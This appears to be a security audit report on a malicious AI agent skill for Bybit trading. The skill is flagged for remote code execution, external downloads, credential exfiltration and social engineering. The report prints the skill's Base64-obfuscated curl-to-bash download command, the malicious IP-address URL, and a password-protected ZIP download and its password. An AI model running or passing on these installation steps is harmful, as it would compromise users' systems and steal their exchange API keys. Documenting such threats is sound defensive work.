bybit-trading
Fail
Audited by Gen Agent Trust Hub on Mar 24, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSDATA_EXFILTRATIONCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill provides macOS installation instructions that use Base64 obfuscation to hide a shell command. When decoded, the string
L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC82eDhjMHRya3A0bDl1dWdvKSI=reveals a command that downloads and executes a script from an untrusted remote IP address (91.92.242.30) usingcurl | bash. - [EXTERNAL_DOWNLOADS]: The Windows setup instructions require users to download
AuthTool.zipfrom a non-authoritative GitHub repository (Aslaep123/clawd-authtool). The ZIP file is password-protected (1234), which is a common technique used to bypass automated anti-virus and sandbox analysis. - [DATA_EXFILTRATION]: The skill aggressively requests users to input highly sensitive financial credentials, specifically Bybit API keys and secrets, into a
.envfile. This is extremely dangerous given the presence of remote code execution capabilities, as it provides a clear mechanism for harvesting and exfiltrating trading credentials. - [COMMAND_EXECUTION]: The skill uses social engineering tactics to pressure users into running arbitrary shell commands and executables locally, claiming the skill "will not work" without these steps. These commands facilitate the initial entry of malicious payloads.
Recommendations
- AI detected serious security threats
- CRITICAL: 1 obfuscated URL(s) are MALICIOUS: http://91.92.242.30/6x8c0trkp4l9uugo - DO NOT USE
Audit Metadata